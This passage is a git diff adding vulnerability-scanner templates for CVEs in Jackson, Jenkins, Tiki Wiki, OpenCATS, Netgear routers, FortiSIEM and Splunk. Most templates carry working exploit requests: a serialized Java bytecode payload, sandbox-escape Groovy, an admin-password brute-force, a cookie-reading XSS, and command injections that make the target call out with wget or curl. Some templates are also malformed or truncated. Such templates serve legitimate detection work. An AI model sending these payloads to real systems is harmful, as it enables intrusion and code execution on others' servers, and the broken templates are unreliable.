s.send(hb) + hit_hb(s) + + if __name__ == '__main__': + main() + + matchers: + - type: dsl + dsl: + - "contains(response,'server is vulnerable')" diff --git a/poc/cve/CVE-2016-8735.yaml b/poc/cve/CVE-2016-8735.yaml new file mode 100644 index 0000000000..cf1f824eb9 --- /dev/null +++ b/poc/cve/CVE-2016-8735.yaml @@ -0,0 +1,87 @@ +id: CVE-2016-8735-tomcat-jmx-rce + +info: + name: Apache Tomcat JMX Remote Code Execution + author: your_github_username + severity: critical + description: Apache Tomcat versions before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 are vulnerable to remote code execution if JmxRemoteLifecycleListener is used and the JMX ports are exposed. + reference: + - http://rhn.redhat.com/errata/RHSA-2017-0457.html + - http://www.securityfocus.com/bid/94463 + - http://tomcat.apache.org/security-9.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2016-8735 + tags: cve,cve2016,apache,tomcat,rce,jmx + +http: + - method: GET + path: + - "{{BaseURL}}/manager/status" + - "{{BaseURL}}:8080/manager/status" + - "{{BaseURL}}:8000/manager/status" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Apache Tomcat" + part: body + + extractors: + - type: regex + name: version + group: 1 + regex: + - "Apache Tomcat/([0-9.]+)" + + - method: GET + path: + - "{{BaseURL}}:{{jmx_ports}}" + attack: batteringram + payloads: + jmx_ports: + - "1099" + - "9999" + - "8999" + + matchers-condition: and + matchers: + - type: word + words: + - "JMX" + - "RMI" + condition: and + - type: status + status: + - 200 + + extractors: + - type: regex + name: jmx_port + group: 1 + regex: + - ":([0-9]+)" + + - method: GET + path: + - "{{BaseURL}}/manager/jmxproxy" + + matchers-condition: and + matchers: + - type: word + words: + - "JMXProxyServlet" + - type: dsl + dsl: + - 'version != "" && jmx_port != "" && (version < "6.0.48" || (version >= "7.0.0" && version < "7.0.73") || (version >= "8.0.0" && version < "8.0.39") || (version >= "8.5.0" && version < "8.5.7") || (version >= "9.0.0" && version < "9.0.0.M12"))' + + extractors: + - type: regex + name: jmxproxy + regex: + - "JMXProxyServlet" diff --git a/poc/cve/CVE-2017-7525.yaml b/poc/cve/CVE-2017-7525.yaml new file mode 100644 index 0000000000..75e8452097 --- /dev/null +++ b/poc/cve/CVE-2017-7525.yaml @@ -0,0 +1,63 @@ +id: CVE-2017-7525 + +info: + name: Jackson RCE - Unauthenticated Remote Code Execution + author: cheoljun99,KoYejune0302,sim4110,gy741 + severity: critical + description: | + Jackson Databind is a popular Java library used for serializing Java objects to JSON (JavaScript Object Notation) and deserializing JSON back into Java objects. + CVE-2017-7525 is a critical deserialization vulnerability in the Jackson library which allows for remote code execution. + Vulnerable environment is Jackson 2.8.8 + Send following request to use the Template to execute Java bytescode, which contains command touch /tmp/prove1.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2017-7525 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2017-7525 + - https://github.com/FasterXML/jackson-docs/wiki/JacksonPolymorphicDeserialization + - https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/ + - https://github.com/irsl/jackson-rce-via-spel + - https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1 + tags: Jackson,cve,cve2017,rce,unauth + +requests: + - raw: + - | + POST {{path}} HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en + User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) + Connection: close + Content-Type: application/json + Content-Length: 1298 + + { + "param": [ + "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", + { + "transletBytecodes": [ + "yv66vgAAADMAKAoABAAUCQADABUHABYHABcBAAVwYXJhbQEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAcTGNvbS9iMW5nei9zZWMvbW9kZWwvVGFyZ2V0OwEACGdldFBhcmFtAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAhzZXRQYXJhbQEAFShMamF2YS9sYW5nL09iamVjdDspVgEAClNvdXJjZUZpbGUBAAtUYXJnZXQuamF2YQwABwAIDAAFAAYBABpjb20vYjFuZ3ovc2VjL21vZGVsL1RhcmdldAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwAZAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwAGwAcCgAaAB0BABV0b3VjaCAvdG1wL3Byb3ZlMS50eHQIAB8BAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAhACIKABoAIwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHACUKACYAFAAhAAMAJgAAAAEAAgAFAAYAAAAEAAEABwAIAAEACQAAAC8AAQABAAAABSq3ACexAAAAAgAKAAAABgABAAAABgALAAAADAABAAAABQAMAA0AAAABAA4ADwABAAkAAAAvAAEAAQAAAAUqtAACsAAAAAIACgAAAAYAAQAAAAoACwAAAAwAAQAAAAUADAANAAAAAQAQABEAAQAJAAAAPgACAAIAAAAGKiu1AAKxAAAAAgAKAAAACgACAAAADgAFAA8ACwAAABYAAgAAAAYADAANAAAAAAAGAAUABgABAAgAGAAIAAEACQAAABYAAgAAAAAACrgAHhIgtgAkV7EAAAAAAAEAEgAAAAIAEw==" + ], + "transletName": "a.b", + "outputProperties": {} + } + ] + } + + matchers-condition: and + matchers: + - type: status + status: + - 400 + + - type: word + part: header + words: + - application/json + + - type: word + words: + - "JSON parse error: null; nested exception is com.fasterxml.jackson.databind.JsonMappingException" \ No newline at end of file diff --git a/poc/cve/CVE-2019-1003000.yaml b/poc/cve/CVE-2019-1003000.yaml new file mode 100644 index 0000000000..30762e8ec6 --- /dev/null +++ b/poc/cve/CVE-2019-1003000.yaml @@ -0,0 +1,99 @@ +id: CVE-2019-1003000 + +info: + name: Jenkins Script Security Plugin - Sandbox Bypass + author: sttlr + severity: high + description: | + A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2019-1003000 + cpe: cpe:2.3:a:jenkins:script_security::::::jenkins::* + reference: + - https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266 + - http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_metaprogramming + - https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins + - https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION + - https://github.com/purple-WL/Jenkins_CVE-2019-1003000 + - https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc + metadata: + vendor: jenkins + product: script_security + tags: cve,cve2019,jenkins,code + +variables: + username: admin + vendor_name: "{{rand_text_alpha(3)}}.{{rand_text_alpha(5)}}" + app_name: "{{rand_text_alpha(8)}}" + +flow: http(1,2) && (http(3) || http(4)) + +http: + - raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Jenkins" + - 'name="j_username"' + - 'name="j_password"' + internal: true + + - raw: + - | + POST /j_acegi_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body_2, "/logout")' + - 'contains(body_2, "[Jenkins]")' + condition: and + internal: true + + - raw: + - | + GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-c%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1 + Host: {{Hostname}} + - | + GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-n%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1 + Host: {{Hostname}} + + stop-at-first-match: true + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - raw: + - | + GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2f{{interactsh-url}}%2f%27)%0a@Grab(%27{{vendor_name}}:{{app_name}}:1%27)%0aimport%20{{app_name}}; HTTP/1.1 + Host: {{Hostname}} + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: interactsh_request + words: + - "/{{replace(vendor_name, '.', '/')}}/{{app_name}}/1/{{app_name}}-1.pom" diff --git a/poc/cve/CVE-2020-15906.yaml b/poc/cve/CVE-2020-15906.yaml new file mode 100644 index 0000000000..810dcf8f2b --- /dev/null +++ b/poc/cve/CVE-2020-15906.yaml @@ -0,0 +1,150 @@ +id: CVE-2020-15906 + +info: + name: Tiki Wiki CMS GroupWare - Auth Bypass + author: JeonSungHyun[nukunga],gy741,oIfloraIo,nechyo,harksu + severity: critical + description: | + tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts. + reference: + - https://packetstormsecurity.com/files/159663/Tiki-Wiki-CMS-Groupware-21.1-Authentication-Bypass.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-15906 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-15906 + cwe-id: CWE-307 + cpe: cpe:2.3:a:tiki:tiki:*:*:*:*:*:*:*:* + metadata: + verified: true + vendor: Tiki Wiki CMS + product: Tiki Wiki CMS + shodan-query: title:"Tiki Wiki CMS" + fofa-query: title="Tiki Wiki CMS" + google-query: intitle:"Tiki Wiki CMS + tags: cve,cve2020,tiki,wiki,auth-bypass + +http: + - raw: + - | + GET /tiki-login_scr.php HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + part: body + name: ticket1 + internal: true + group: 1 + regex: + - 'class="ticket" name="ticket" value="(.*)"' + + - raw: + - | + POST /tiki-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/tiki-login_scr.php + + ticket={{ticket1}}&user=admin&pass={{attempt}}&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n + + payloads: + attempt: + - nkQ0yYzgF5Er + - P5UdGflH48W3 + - xFq7vKNLmhZp + - 8zKtGnh4dW5R + - CfXp2VbQz8Er + - Lh3K6vPzM9Xn + - bG4RxHpY2MdQ + - 7zNtKh3WqF5L + - Y8rQ2GpLx9Kn + - C7KzLmP5X9Vh + - v3LdX8GmQ5Kn + - W4NzX6PqL3Ft + - Q5GhY2VrX7Jk + - r9KdL4PhY6Gm + - 8XjVq5LhZ2Kr + - L5WnQ9KzY8Pr + - M2XdL5GrY9Kh + - N6YzP8WkL5Xt + - G7JqX5VbM2Kp + - H4PrX8LkY6Gm + - J5LhY2VqX9Kr + - 8GrX5NqL2KhY + - K4WnY9PzM8Xt + - Q2XkL5PrY8Vh + - 9JhL4VqX5GrM + - N2XdY5PqL9Kh + - W4LhY8KzM5Xt + - G5JqX2VrY9Kp + - H9PrL5XkY2Gm + - L8WnX5KzY9Pr + - M4XkY2LqV5Gt + - N5XdL9PqY8Kr + - P8XnL5VrY2Kh + - Q4JqX9LhY5Gr + - V7LkX5PrY2Gt + - L2WnY9KzX8Pr + - M9XdL5PqY4Kh + - N8LhY2VqX5Gr + - Q7XkL5PrY9Gm + - X4LhY8WnM5Kp + - G2JqL5VrY9Kt + - H7PrX8KzY2Gm + - J4LhY5VqX9Kr + - N9XkY2LqP5Gt + - W8LhY5PrX2Kz + - G4JqL5XkY9Vr + - P5WnY2KzL8Gt + - M7XkY9LhP2Gr + - Q2JqL5VrY8Kh + - 2JqL5VrY8Kh + attack: batteringram + threads: 50 + + - raw: + - | + GET /tiki-login_scr.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /tiki-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/tiki-login.php + + ticket={{ticket2}}&user=admin&pass=&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n + + extractors: + - type: regex + part: body_1 + name: ticket2 + internal: true + group: 1 + regex: + - 'class="ticket" name="ticket" value="(.*)"' + + - raw: + - | + GET /tiki-index.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: or + matchers: + - type: word + part: body + words: + - "System Menu" + - "Home" + - "Search" + - "Wiki" + - "File Galleries" + - "Settings" + condition: and + + - type: word + words: + - "Show on admin log-in" + - "Tiki Setup" + condition: and diff --git a/poc/cve/CVE-2023-27294.yaml b/poc/cve/CVE-2023-27294.yaml new file mode 100644 index 0000000000..e1ab8d6c08 --- /dev/null +++ b/poc/cve/CVE-2023-27294.yaml @@ -0,0 +1,64 @@ +id: CVE-2023-27294 + +info: + name: OpenCATS - Authenticated Stored XSS + author: woo4826, gy741, jyjyjy25, oriing, ANseunghyeon + severity: medium + description: | + OpenCATS version 0.9.6 contains a vulnerability that allows an authenticated user to perform a stored cross-site scripting (XSS) attack. This vulnerability exists due to improper sanitization of user-supplied input within the calendar event description field. An attacker can exploit this vulnerability by injecting malicious JavaScript code into the description of a calendar event, which will be executed in the context of another user’s browser when they view the event. + impact: | + An attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware. + remediation: | + Apply the latest patch or update to the latest version of OpenCATS to fix the open redirect vulnerability. + reference: + - https://www.tenable.com/security/research/tra-2023-8 + - https://nvd.nist.gov/vuln/detail/CVE-2023-27294 + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:L + cvss-score: 6.1 + cve-id: CVE-2023-27294 + cwe-id: CWE-79 + cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: opencats + product: opencats + shodan-query: + - title:"opencats" + - http.title:"opencats" + fofa-query: title="opencats" + google-query: intitle:"opencats" + tags: cve,cve2023,opencats,xss,authenticated,tenable + +http: + - raw: + - | + POST /index.php?m=calendar&view=MONTHVIEW&month=7&year=2024&week=-1&day=-1&a=addEvent HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Content-Length: {{Content-Length}} + Cookie: CATS={{cats_session_token}} + + postback=postback&title=test&type=600&publicEntry=on&dateAdd=07-30-24&allDay=1&sendEmail=admin%40testdomain.com&reminderTime=15&description=%3Cimg+src%3D%22http://localhost%2Fimages%2FapplicationLogo.jpg%22+onload%3D%22alert%28document.cookie%29%22%3E&submit=Add+Event + + - | + GET {{extracted_path}} HTTP/1.1 + Content-Length: {{Content-Length}} + Cookie: CATS={{cats_session_token}} + + extractors: + - type: regex + part: header + name: extracted_path + internal: true + regex: + - \/index[^?]*(\S+) + + matchers: + - type: word + words: + - "onload%3D%22alert%28document.cookie" + + diff --git a/poc/cve/CVE-2023-33533.yaml b/poc/cve/CVE-2023-33533.yaml new file mode 100644 index 0000000000..f6b204d20b --- /dev/null +++ b/poc/cve/CVE-2023-33533.yaml @@ -0,0 +1,65 @@ +id: cve-2023-33533 + +info: + name: Netgear D6220/D8500/R6700/R6900 Authenticated Command Injection + author: CodeStuffBreakThings + severity: high + description: Netgear D6220 with Firmware Version 1.0.0.80, D8500 with Firmware Version 1.0.3.60, R6700 with Firmware Version 1.0.2.26, and R6900 with Firmware Version 1.0.2.26 are vulnerable to Command Injection. If an attacker gains web management privileges, they can inject commands into the post request parameters, gaining shell privileges. + remediation: Upgrade to a newer firmware version. Replace the router if it is end-of-life. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-33533 + - https://github.com/D2y6p/CVE/blob/main/Netgear/CVE-2023-33533/Exp.py + - https://github.com/D2y6p/CVE/blob/main/Netgear/CVE-2023-33533/Netgear_RCE.pdf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-33533 + cwe-id: CWE-77 + tags: cve2023,cve,netgear,router,rce,oast,authenticated + +http: + - raw: + - | + GET /IPV6_fixed.htm HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic Zm9vOmRlZmF1bHQK + Referer: http://{{Host}}/IPV6_disable.htm + XSRF_TOKEN: 2267229739 + + - | + GET /IPV6_fixed.htm HTTP/1.1 + Host: {{Hostname}} + Referer: http://{{Host}}/IPV6_disable.htm + XSRF_TOKEN: {{xsrf_token}} + + - | + POST /ipv6_fix.cgi?id={{csrf_id}} HTTP/1.1 + Host: {{Hostname}} + Referer: http://{{Host}}/IPV6_disable.htm + XSRF_TOKEN: {{xsrf_token}} + Content-Type: text/plain + + apply=Apply&login_type=Fixed&IPv6WanAddr1=2001&IPv6WanAddr2=3CA2&IPv6WanAddr3=010F&IPv6WanAddr4=00A1&IPv6WanAddr5=121C&IPv6WanAddr6=0000&IPv6WanAddr7=0000&IPv6WanAddr8=0010&ProfixWanLength=6&IPv6Gateway1=2001&IPv6Gateway2=3CA2&IPv6Gateway3=010F&IPv6Gateway4=00A1&IPv6Gateway5=121C&IPv6Gateway6=0000&IPv6Gateway7=0000&IPv6Gateway8=0002&DAddr1=&DAddr2=&DAddr3=&DAddr4=&DAddr5=&DAddr6=&DAddr7=&DAddr8=&PDAddr1=&PDAddr2=&PDAddr3=&PDAddr4=&PDAddr5=&PDAddr6=&PDAddr7=&PDAddr8=&IpAssign=auto&IPv6LanAddr1=3113&IPv6LanAddr2=3CA2&IPv6LanAddr3=010F&IPv6LanAddr4=001A&IPv6LanAddr5=121B&IPv6LanAddr6=0000&IPv6LanAddr7=0000&IPv6LanAddr8=0001&ProfixLanLength=6&ipv6_wan_ipaddr=$(wget {{interactsh-url}})&ipv6_lan_ipaddr=3113%3A3CA2%3A010F%3A001A%3A121B%3A0000%3A0000%3A0001&ipv6_wan_length=6&ipv6_lan_length=6&ipv6_pri_dns=%3A%3A%3A%3A%3A%3A%3A&ipv6_sec_dns=%3A%3A%3A%3A%3A%3A%3A&ipv6_wan_gateway=aaa&ipv6_enable_dhcp=&ipv6_proto=fixed + + extractors: + - type: regex + name: xsrf_token + group: 1 + part: header + regex: + - 'Set-Cookie: XSRF_TOKEN=(.*?);' + internal: true + + - type: regex + name: csrf_id + group: 1 + part: body + regex: + - 'cgi\?id=([\w\d]+)' + internal: true + + matchers: + - type: word + part: interactsh_protocol + words: + - http diff --git a/poc/cve/CVE-2023-34992.yaml b/poc/cve/CVE-2023-34992.yaml new file mode 100644 index 0000000000..0a723bb996 --- /dev/null +++ b/poc/cve/CVE-2023-34992.yaml @@ -0,0 +1,50 @@ +id: CVE-2023-34992 + +info: + name: Fortinet FortiSIEM Unauthenticated Command Injection - CVE-2023-34992 + author: thacien + severity: critical + description: An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM versions 7.1.0 through 7.1.1, 7.0.0 through 7.0.2, 6.7.0 through 6.7.8, 6.6.0 through 6.6.3, 6.5.0 through 6.5.2, and 6.4.0 through 6.4.3 allows an unauthenticated attacker to execute unauthorized code or commands via crafted API requests. + impact: Successful exploitation of this vulnerability could allow an unauthenticated attacker to execute arbitrary code on the affected system. + remediation: upgrade to FortiSIEM version >=6.4.4, >=6.5.3, >=6.6.4, >=6.7.9, >=7.0.3, >=7.1.2 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-34992 + - https://www.horizon3.ai/attack-research/disclosures/cve-2023-34992-fortinet-fortisiem-command-injection-deep-dive/ + - https://github.com/horizon3ai/CVE-2023-34992 + - https://fortiguard.com/psirt/FG-IR-23-130 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-34992 + cwe-id: CWE-78 + epss-score: 0.00078 + cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:* +metadata: + verified: false + max-request: 1 + vendor: fortinet + product: fortisiem + tags: CVE-2023-34992,fortisiem,network,cve,fortinet,rce,tcp,unauth + +# generate the payload to send a curl request to an OOB server +variables: + - exploit: '\n 127.0.0.1; curl -k "{{interactsh_url}}";\n /test\n\n' + - payload: '{{51000000 + hex_encode(len("{{exploit}}")) + 0000006f421e4000000000}}' +tcp: + - host: + - "tls://{{Hostname}}" + port: 7900 + inputs: + - data: '{{hex_decode("{{payload}}") + exploit}}' + read-size: 2048 + matchers-condition: and + # if oob server receives and http request + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + - type: status + part: interactsh_request + status: + - 200 diff --git a/poc/cve/CVE-2023-43494.yaml b/poc/cve/CVE-2023-43494.yaml new file mode 100644 index 0000000000..689b2ec50d --- /dev/null +++ b/poc/cve/CVE-2023-43494.yaml @@ -0,0 +1,42 @@ +id: jenkins-cve-2023-43494 + +info: + name: Jenkins CVE-2023-43494 Exploit + author: Saumya Agarwal + severity: medium + description: | + Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) does not exclude sensitive build variables (e.g., password parameter values) from the search in the build history widget, allowing attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters until the correct sequence is discovered. + reference: + - http://www.openwall.com/lists/oss-security/2023/09/20/5 + - https://www.jenkins.io/security/advisory/2023-09-20/#SECURITY-3261 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cve-id: CVE-2023-43494 + cwe-id: CWE-200 + tags: jenkins, cve-2023-43494, exploit + +variables: + project_name: "{{project_name}}" + search_string: "{{search_string}}" + +requests: + - method: GET + path: + - "{{BaseURL}}/job/{{project_name}}/buildHistory/ajax?search={{search_string}}" + + headers: + accept: "*/*" + accept-language: "en-US,en;q=0.9" + sec-fetch-mode: "cors" + sec-fetch-site: "same-origin" + referer: "{{BaseURL}}/job/{{project_name}}/" + referrerPolicy: "same-origin" + + matchers: + - type: status + status: + - 200 + - type: regex + part: body + regex: + - "(?s)]*>.*?]*>.*?.*?" diff --git a/poc/cve/CVE-2023-46214.yaml b/poc/cve/CVE-2023-46214.yaml new file mode 100644 index 0000000000..c86ed915e6 --- /dev/null +++ b/poc/cve/CVE-2023-46214.yaml @@ -0,0 +1,194 @@ +id: CVE-2023-46214 + +info: + name: Splunk Enterprise < 9.1.2 - XML Injection + author: jackhax + severity: high + description: | + In Splunk Enterprise versions below 9.0.7 and 9.1.2, Splunk Enterprise does not safely sanitize extensible stylesheet language transformations (XSLT) that users supply. This means that an attacker can upload malicious XSLT which can result in remote code execution on the Splunk Enterprise instance. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to perform remote code execution. + remediation: | + Upgrade Splunk Enterprise to either 9.0.7 or 9.1.2. Or limit the ability of search job requests to accept XSL as valid input. + reference: + - https://advisory.splunk.com/advisories/SVD-2023-1104 + - https://github.com/nathan31337/Splunk-RCE-poc + - https://nvd.nist.gov/vuln/detail/CVE-2023-46214 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-46214 + cwe-id: CWE-91 + epss-score: 0.05 + epss-percentile: 0.129 + cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* + metadata: + verified: true + max-request: 13 + vendor: Splunk + product: Splunk Enterprise + tags: cve2023,cve,rce,splunk,xml + +variables: + randint: "{{rand_int(1000000000,9999999999)}}" + filename: "{{rand_base(6)}}" + +http: + - raw: + - | + GET /en-US/account/login?return_to=%2Fen-US%2Faccount%2F HTTP/1.1 + Host: {{Hostname}} + + redirects: true + extractors: + - type: kval + name: cval + part: cookie + kval: + - "cval" + internal: true + + - raw: + - | + POST /en-US/account/login?return_to=%2Fen-US%2Faccount%2F HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + cval={{cval}}&username={{username}}&password={{password}}&set_has_logged_in=false + + redirects: true + extractors: + - type: kval + name: csrf_1 + part: cookie + kval: + - "splunkweb_csrf_token_8000" + internal: true + + - raw: + - | + POST /en-US/splunkd/__upload/indexing/preview?output_mode=json&props.NO_BINARY_CHECK=1&input.path={{filename}}.xsl HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=8d047bf6a7fc6ed1e8a2d789c657e3af + X-Requested-With: XMLHttpRequest + X-Splunk-Form-Key: {{csrf_1}} + + --8d047bf6a7fc6ed1e8a2d789c657e3af + Content-Disposition: form-data; name="spl-file"; filename="{{filename}}.xsl" + Content-Type: application/xslt+xml + + + + + + mkdir /opt/splunk/var/run/splunk/dispatch/{{randint}} + + + + --8d047bf6a7fc6ed1e8a2d789c657e3af-- + + extractors: + - type: json + part: body + name: text_value + json: + - '.messages[0].text' + internal: true + + - raw: + - | + POST /en-US/splunkd/__raw/servicesNS/{{username}}/search/search/jobs?output_mode=json HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + X-Splunk-Form-Key: "{{csrf_1}}" + Content-Type: application/x-www-form-urlencoded + + search=%7Csearch+test%7Chead+1 + + extractors: + - type: json + part: body + name: jsid + json: + - '.sid' + internal: true + + - raw: + - | + POST /en-US/account/login?return_to=%2Fen-US%2Faccount%2F HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + cval={{cval}}&username={{username}}&password={{password}}&set_has_logged_in=false + + redirects: true + extractors: + - type: kval + name: csrf_2 + part: cookie + kval: + - "splunkweb_csrf_token_8000" + internal: true + + - raw: + - | + GET /en-US/api/search/jobs/{{jsid}}/results?xsl=/opt/splunk/var/run/splunk/dispatch/{{text_value}}/{{filename}}.xsl HTTP/1.1 + Host: {{Hostname}} + X-Splunk-Module: Splunk.Module.DispatchingModule + X-Requested-With: XMLHttpRequest + + - raw: + - | + POST /en-US/splunkd/__raw/servicesNS/{{username}}/search/search/jobs HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + X-Splunk-Form-Key: "{{csrf_2}}" + + search=|runshellscript "shell.sh" "" "" "" "" "" "" "" "{{jsid}}" + + extractors: + - type: xpath + name: sid + xpath: + - '//sid/text()' + internal: true + + - raw: + - | + POST /en-US/account/login?return_to=%2Fen-US%2Faccount%2F HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + cval={{cval}}&username={{username}}&password={{password}}&set_has_logged_in=false + + redirects: true + extractors: + - type: kval + name: csrf_3 + part: cookie + kval: + - "splunkweb_csrf_token_8000" + internal: true + + - raw: + - | + GET /en-US/splunkd/__raw/services/search/jobs/{{randint}}/search.log HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: header + words: + - '{{randint}}' + + - type: status + status: + - 200 + + - type: word + part: body + words: + - 'FATAL' + - 'ERROR' + negative: true diff --git a/poc/cve/CVE-2023-49799.yaml b/poc/cve/CVE-2023-49799.yaml new file mode 100644 index 0000000000..0727f54698 --- /dev/null +++ b/poc/cve/CVE-2023-49799.yaml @@ -0,0 +1,60 @@ +id: CVE-2023-49799 + +info: + name: nuxt-api-party - SSRF & Credentials Leak + author: chae1xx1os, eeche, persona-twotwo, soonghee2 + severity: high + description: | + nuxt-api-party allows developers to proxy requests to an API without exposing credentials to the client. This vulnerability allows an attacker to change the baseURL of the request, potentially leading to credentials being leaked or SSRF. + impact: | + The vulnerability allows an attacker to: + - Leak sensitive API credentials by bypassing URL validation. + - Perform Server-Side Request forgery (SSRF) attacks, potentially accessing internal services or resources not intended to be exposed. + remediation: | + To remediate this vulnerability: + - Update `nuxt-api-party` to version `0.22.0` or later. + - Revert to the previous method of detecting absolute URLs by checking the origin of the URL. + - Ensure that any input used to construct URLs is properly sanitized to remove any leading or trailing whitespace that could bypass URL validation. + reference: + - https://github.com/johannschopplich/nuxt-api-party/security/advisories/GHSA-3wfp-253j-5jxv + - https://nvd.nist.gov/vuln/detail/CVE-2023-49799 + - https://github.com/johannschopplich/nuxt-api-party/commit/72762a200fc19d997a0f84bce578c28698dc5270 + - https://fetch.spec.whatwg.org/ + - https://fetch.spec.whatwg.org/#http-whitespace-byte + - https://github.com/johannschopplich/nuxt-api-party/blob/777462e1e3af1d9f8938aa33f230cd8cb6e0cc9a/src/runtime/server/handler.ts#L31 + - https://infra.spec.whatwg.org/#byte-sequence + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + 